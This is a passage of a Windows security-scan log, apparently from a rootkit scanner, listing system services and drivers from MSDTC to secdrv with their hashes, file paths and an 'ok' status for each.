23:16:25.0424 0x0e30 [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC C:\windows\System32\msdtc.exe
23:16:25.0424 0x0e30 MSDTC - ok
23:16:25.0440 0x0e30 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs C:\windows\system32\drivers\Msfs.sys
23:16:25.0440 0x0e30 Msfs - ok
23:16:25.0471 0x0e30 [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf C:\windows\System32\drivers\mshidkmdf.sys
23:16:25.0471 0x0e30 mshidkmdf - ok
23:16:25.0502 0x0e30 [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv C:\windows\system32\drivers\msisadrv.sys
23:16:25.0502 0x0e30 msisadrv - ok
23:16:25.0534 0x0e30 [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI C:\windows\system32\iscsiexe.dll
23:16:25.0549 0x0e30 MSiSCSI - ok
23:16:25.0549 0x0e30 msiserver - ok
23:16:25.0580 0x0e30 [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV C:\windows\system32\drivers\MSKSSRV.sys
23:16:25.0596 0x0e30 MSKSSRV - ok
23:16:25.0612 0x0e30 [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK C:\windows\system32\drivers\MSPCLOCK.sys
23:16:25.0612 0x0e30 MSPCLOCK - ok
23:16:25.0627 0x0e30 [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM C:\windows\system32\drivers\MSPQM.sys
23:16:25.0627 0x0e30 MSPQM - ok
23:16:25.0658 0x0e30 [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC C:\windows\system32\drivers\MsRPC.sys
23:16:25.0674 0x0e30 MsRPC - ok
23:16:25.0705 0x0e30 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios C:\windows\system32\DRIVERS\mssmbios.sys
23:16:25.0705 0x0e30 mssmbios - ok
23:16:25.0752 0x0e30 [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE C:\windows\system32\drivers\MSTEE.sys
23:16:25.0752 0x0e30 MSTEE - ok
23:16:25.0768 0x0e30 [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig C:\windows\system32\drivers\MTConfig.sys
23:16:25.0783 0x0e30 MTConfig - ok
23:16:25.0799 0x0e30 [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup C:\windows\system32\Drivers\mup.sys
23:16:25.0799 0x0e30 Mup - ok
23:16:25.0830 0x0e30 [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent C:\windows\system32\qagentRT.dll
23:16:25.0846 0x0e30 napagent - ok
23:16:25.0908 0x0e30 [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP C:\windows\system32\DRIVERS\nwifi.sys
23:16:25.0924 0x0e30 NativeWifiP - ok
23:16:25.0986 0x0e30 [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS C:\windows\system32\drivers\ndis.sys
23:16:26.0002 0x0e30 NDIS - ok
23:16:26.0033 0x0e30 [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap C:\windows\system32\DRIVERS\ndiscap.sys
23:16:26.0033 0x0e30 NdisCap - ok
23:16:26.0064 0x0e30 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi C:\windows\system32\DRIVERS\ndistapi.sys
23:16:26.0064 0x0e30 NdisTapi - ok
23:16:26.0080 0x0e30 [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio C:\windows\system32\DRIVERS\ndisuio.sys
23:16:26.0080 0x0e30 Ndisuio - ok
23:16:26.0126 0x0e30 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan C:\windows\system32\DRIVERS\ndiswan.sys
23:16:26.0126 0x0e30 NdisWan - ok
23:16:26.0142 0x0e30 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy C:\windows\system32\drivers\NDProxy.sys
23:16:26.0142 0x0e30 NDProxy - ok
23:16:26.0158 0x0e30 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS C:\windows\system32\DRIVERS\netbios.sys
23:16:26.0158 0x0e30 NetBIOS - ok
23:16:26.0189 0x0e30 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT C:\windows\system32\DRIVERS\netbt.sys
23:16:26.0189 0x0e30 NetBT - ok
23:16:26.0314 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon C:\windows\system32\lsass.exe
23:16:26.0314 0x0e30 Netlogon - ok
23:16:26.0360 0x0e30 [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman C:\windows\System32\netman.dll
23:16:26.0376 0x0e30 Netman - ok
23:16:26.0423 0x0e30 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:16:26.0454 0x0e30 NetMsmqActivator - ok
23:16:26.0563 0x0e30 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:16:26.0563 0x0e30 NetPipeActivator - ok
23:16:26.0626 0x0e30 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm C:\windows\System32\netprofm.dll
23:16:26.0626 0x0e30 netprofm - ok
23:16:26.0766 0x0e30 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:16:26.0766 0x0e30 NetTcpActivator - ok
23:16:26.0782 0x0e30 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:16:26.0782 0x0e30 NetTcpPortSharing - ok
23:16:26.0844 0x0e30 [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960 C:\windows\system32\drivers\nfrd960.sys
23:16:26.0844 0x0e30 nfrd960 - ok
23:16:26.0969 0x0e30 [ C5EAE2B8A6188F8A3810D6FE80F3F3D7, 4944BC589B7A0A3969343DD21A54C8476F8662F7BE2C86E8BD03BA2B51AEA4C8 ] NitroReaderDriverReadSpool3 C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe
23:16:26.0984 0x0e30 NitroReaderDriverReadSpool3 - ok
23:16:27.0016 0x0e30 [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc C:\windows\System32\nlasvc.dll
23:16:27.0016 0x0e30 NlaSvc - ok
23:16:27.0062 0x0e30 Norton PC Checkup Application Launcher - ok
23:16:27.0094 0x0e30 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs C:\windows\system32\drivers\Npfs.sys
23:16:27.0094 0x0e30 Npfs - ok
23:16:27.0125 0x0e30 [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi C:\windows\system32\nsisvc.dll
23:16:27.0140 0x0e30 nsi - ok
23:16:27.0140 0x0e30 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy C:\windows\system32\drivers\nsiproxy.sys
23:16:27.0140 0x0e30 nsiproxy - ok
23:16:27.0234 0x0e30 [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs C:\windows\system32\drivers\Ntfs.sys
23:16:27.0281 0x0e30 Ntfs - ok
23:16:27.0296 0x0e30 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null C:\windows\system32\drivers\Null.sys
23:16:27.0296 0x0e30 Null - ok
23:16:27.0328 0x0e30 [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid C:\windows\system32\drivers\nvraid.sys
23:16:27.0343 0x0e30 nvraid - ok
23:16:27.0359 0x0e30 [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor C:\windows\system32\drivers\nvstor.sys
23:16:27.0374 0x0e30 nvstor - ok
23:16:27.0390 0x0e30 [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp C:\windows\system32\drivers\nv_agp.sys
23:16:27.0406 0x0e30 nv_agp - ok
23:16:27.0546 0x0e30 [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
23:16:27.0562 0x0e30 odserv - ok
23:16:27.0593 0x0e30 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\windows\system32\drivers\ohci1394.sys
23:16:27.0608 0x0e30 ohci1394 - ok
23:16:27.0640 0x0e30 [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:16:27.0640 0x0e30 ose - ok
23:16:27.0702 0x0e30 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\windows\system32\pnrpsvc.dll
23:16:27.0718 0x0e30 p2pimsvc - ok
23:16:27.0764 0x0e30 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\windows\system32\p2psvc.dll
23:16:27.0780 0x0e30 p2psvc - ok
23:16:27.0811 0x0e30 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\windows\system32\drivers\parport.sys
23:16:27.0811 0x0e30 Parport - ok
23:16:27.0842 0x0e30 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\windows\system32\drivers\partmgr.sys
23:16:27.0842 0x0e30 partmgr - ok
23:16:27.0874 0x0e30 [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc C:\windows\System32\pcasvc.dll
23:16:27.0874 0x0e30 PcaSvc - ok
23:16:27.0936 0x0e30 [ 2F86BE1818C2D7AC90478E3323EE7FCB, CE721FCFFDC9D24483DEB6BB77DAFEBE79BA143CA2EE68BF28E2A9297AADB2D4 ] PCCUJobMgr C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
23:16:27.0936 0x0e30 PCCUJobMgr - ok
23:16:27.0967 0x0e30 [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci C:\windows\system32\drivers\pci.sys
23:16:27.0967 0x0e30 pci - ok
23:16:27.0998 0x0e30 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\windows\system32\drivers\pciide.sys
23:16:27.0998 0x0e30 pciide - ok
23:16:28.0014 0x0e30 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\windows\system32\drivers\pcmcia.sys
23:16:28.0014 0x0e30 pcmcia - ok
23:16:28.0045 0x0e30 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\windows\system32\drivers\pcw.sys
23:16:28.0045 0x0e30 pcw - ok
23:16:28.0076 0x0e30 [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH C:\windows\system32\drivers\peauth.sys
23:16:28.0108 0x0e30 PEAUTH - ok
23:16:28.0170 0x0e30 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\windows\SysWow64\perfhost.exe
23:16:28.0217 0x0e30 PerfHost - ok
23:16:28.0264 0x0e30 [ 91111CEBBDE8015E822C46120ED9537C, 255B85FEF663C2E0652CECF3F9B67B12B576F924A34415DEE13F0F5137E1E7F7 ] PGEffect C:\windows\system32\DRIVERS\pgeffect.sys
23:16:28.0264 0x0e30 PGEffect - ok
23:16:28.0326 0x0e30 [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla C:\windows\system32\pla.dll
23:16:28.0373 0x0e30 pla - ok
23:16:28.0420 0x0e30 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\windows\system32\umpnpmgr.dll
23:16:28.0435 0x0e30 PlugPlay - ok
23:16:28.0466 0x0e30 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\windows\system32\pnrpauto.dll
23:16:28.0482 0x0e30 PNRPAutoReg - ok
23:16:28.0498 0x0e30 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc C:\windows\system32\pnrpsvc.dll
23:16:28.0513 0x0e30 PNRPsvc - ok
23:16:28.0544 0x0e30 [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent C:\windows\System32\ipsecsvc.dll
23:16:28.0560 0x0e30 PolicyAgent - ok
23:16:28.0576 0x0e30 [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power C:\windows\system32\umpo.dll
23:16:28.0591 0x0e30 Power - ok
23:16:28.0622 0x0e30 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport C:\windows\system32\DRIVERS\raspptp.sys
23:16:28.0622 0x0e30 PptpMiniport - ok
23:16:28.0638 0x0e30 [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor C:\windows\system32\drivers\processr.sys
23:16:28.0638 0x0e30 Processor - ok
23:16:28.0685 0x0e30 [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc C:\windows\system32\profsvc.dll
23:16:28.0700 0x0e30 ProfSvc - ok
23:16:28.0732 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\windows\system32\lsass.exe
23:16:28.0732 0x0e30 ProtectedStorage - ok
23:16:28.0747 0x0e30 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched C:\windows\system32\DRIVERS\pacer.sys
23:16:28.0763 0x0e30 Psched - ok
23:16:28.0825 0x0e30 [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300 C:\windows\system32\drivers\ql2300.sys
23:16:28.0872 0x0e30 ql2300 - ok
23:16:28.0903 0x0e30 [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx C:\windows\system32\drivers\ql40xx.sys
23:16:28.0919 0x0e30 ql40xx - ok
23:16:28.0950 0x0e30 [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE C:\windows\system32\qwave.dll
23:16:28.0950 0x0e30 QWAVE - ok
23:16:28.0966 0x0e30 [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv C:\windows\system32\drivers\qwavedrv.sys
23:16:28.0981 0x0e30 QWAVEdrv - ok
23:16:28.0997 0x0e30 [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd C:\windows\system32\DRIVERS\rasacd.sys
23:16:28.0997 0x0e30 RasAcd - ok
23:16:29.0044 0x0e30 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn C:\windows\system32\DRIVERS\AgileVpn.sys
23:16:29.0044 0x0e30 RasAgileVpn - ok
23:16:29.0059 0x0e30 [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto C:\windows\System32\rasauto.dll
23:16:29.0075 0x0e30 RasAuto - ok
23:16:29.0090 0x0e30 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp C:\windows\system32\DRIVERS\rasl2tp.sys
23:16:29.0090 0x0e30 Rasl2tp - ok
23:16:29.0122 0x0e30 [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan C:\windows\System32\rasmans.dll
23:16:29.0122 0x0e30 RasMan - ok
23:16:29.0153 0x0e30 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe C:\windows\system32\DRIVERS\raspppoe.sys
23:16:29.0153 0x0e30 RasPppoe - ok
23:16:29.0168 0x0e30 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp C:\windows\system32\DRIVERS\rassstp.sys
23:16:29.0168 0x0e30 RasSstp - ok
23:16:29.0215 0x0e30 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss C:\windows\system32\DRIVERS\rdbss.sys
23:16:29.0215 0x0e30 rdbss - ok
23:16:29.0231 0x0e30 [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus C:\windows\system32\drivers\rdpbus.sys
23:16:29.0231 0x0e30 rdpbus - ok
23:16:29.0262 0x0e30 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD C:\windows\system32\DRIVERS\RDPCDD.sys
23:16:29.0262 0x0e30 RDPCDD - ok
23:16:29.0278 0x0e30 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD C:\windows\system32\drivers\rdpencdd.sys
23:16:29.0278 0x0e30 RDPENCDD - ok
23:16:29.0324 0x0e30 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP C:\windows\system32\drivers\rdprefmp.sys
23:16:29.0324 0x0e30 RDPREFMP - ok
23:16:29.0356 0x0e30 [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD C:\windows\system32\drivers\RDPWD.sys
23:16:29.0371 0x0e30 RDPWD - ok
23:16:29.0402 0x0e30 [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost C:\windows\system32\drivers\rdyboost.sys
23:16:29.0418 0x0e30 rdyboost - ok
23:16:29.0449 0x0e30 [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess C:\windows\System32\mprdim.dll
23:16:29.0465 0x0e30 RemoteAccess - ok
23:16:29.0496 0x0e30 [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry C:\windows\system32\regsvc.dll
23:16:29.0496 0x0e30 RemoteRegistry - ok
23:16:29.0527 0x0e30 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper C:\windows\System32\RpcEpMap.dll
23:16:29.0543 0x0e30 RpcEptMapper - ok
23:16:29.0558 0x0e30 [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator C:\windows\system32\locator.exe
23:16:29.0574 0x0e30 RpcLocator - ok
23:16:29.0590 0x0e30 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs C:\windows\system32\rpcss.dll
23:16:29.0605 0x0e30 RpcSs - ok
23:16:29.0652 0x0e30 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr C:\windows\system32\DRIVERS\rspndr.sys
23:16:29.0652 0x0e30 rspndr - ok
23:16:29.0699 0x0e30 [ BE29B0A3AC1E8BD02FFAB8CEE86BADFA, D6F76ECD30EDE1E5B1F01919B1492715947ACCA411D70BB2771427775736C055 ] RSUSBSTOR C:\windows\system32\Drivers\RtsUStor.sys
23:16:29.0699 0x0e30 RSUSBSTOR - ok
23:16:29.0746 0x0e30 [ EE082E06A82FF630351D1E0EBBD3D8D0, 537F1A4108BDA72E8DD271466E7B7FCF39D4D55E4129AB35A409AB7AF2E7D219 ] RTL8167 C:\windows\system32\DRIVERS\Rt64win7.sys
23:16:29.0761 0x0e30 RTL8167 - ok
23:16:29.0839 0x0e30 [ FA088015155C4C6DAB5D1D9E68EB9D6B, 7B2BBA9001BD185E732B1C75AEB0B0ABD92AAA4BF8B0E5FDA2B4AD9A51D6A336 ] RTL8192Ce C:\windows\system32\DRIVERS\rtl8192Ce.sys
23:16:29.0886 0x0e30 RTL8192Ce - ok
23:16:29.0902 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs C:\windows\system32\lsass.exe
23:16:29.0902 0x0e30 SamSs - ok
23:16:29.0933 0x0e30 [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port C:\windows\system32\drivers\sbp2port.sys
23:16:29.0933 0x0e30 sbp2port - ok
23:16:29.0964 0x0e30 [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr C:\windows\System32\SCardSvr.dll
23:16:29.0980 0x0e30 SCardSvr - ok
23:16:29.0995 0x0e30 [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter C:\windows\system32\DRIVERS\scfilter.sys
23:16:29.0995 0x0e30 scfilter - ok
23:16:30.0042 0x0e30 [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule C:\windows\system32\schedsvc.dll
23:16:30.0073 0x0e30 Schedule - ok
23:16:30.0104 0x0e30 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc C:\windows\System32\certprop.dll
23:16:30.0104 0x0e30 SCPolicySvc - ok
23:16:30.0136 0x0e30 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC C:\windows\System32\SDRSVC.dll
23:16:30.0151 0x0e30 SDRSVC - ok
23:16:30.0276 0x0e30 [ D777F1417D9BB9F66CD9D9C3B61F730F, 0CBD830EB9D2B0F1946131F20907793B2D68A3BCEEC3EA5416972149F73DC815 ] SDScannerService C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
23:16:30.0323 0x0e30 SDScannerService - ok
23:16:30.0416 0x0e30 [ 68D6C7F99BC73B88954D844FCCBEB2A0, F746861B103C8BE8EA234B9FCFBBDD2412C79FB65F2F1E0F5E6EBC0B34905FF1 ] SDUpdateService C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
23:16:30.0479 0x0e30 SDUpdateService - ok
23:16:30.0510 0x0e30 [ 9B9B368A8FF5CAF91D7A333CF62CD2CC, A4AE7FFBBAF983BFDE15B521ED162CBC4E6FC85BCDB200C75D45878B3FFDFA68 ] SDWSCService C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
23:16:30.0510 0x0e30 SDWSCService - ok
23:16:30.0541 0x0e30 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\windows\system32\drivers\secdrv.sys
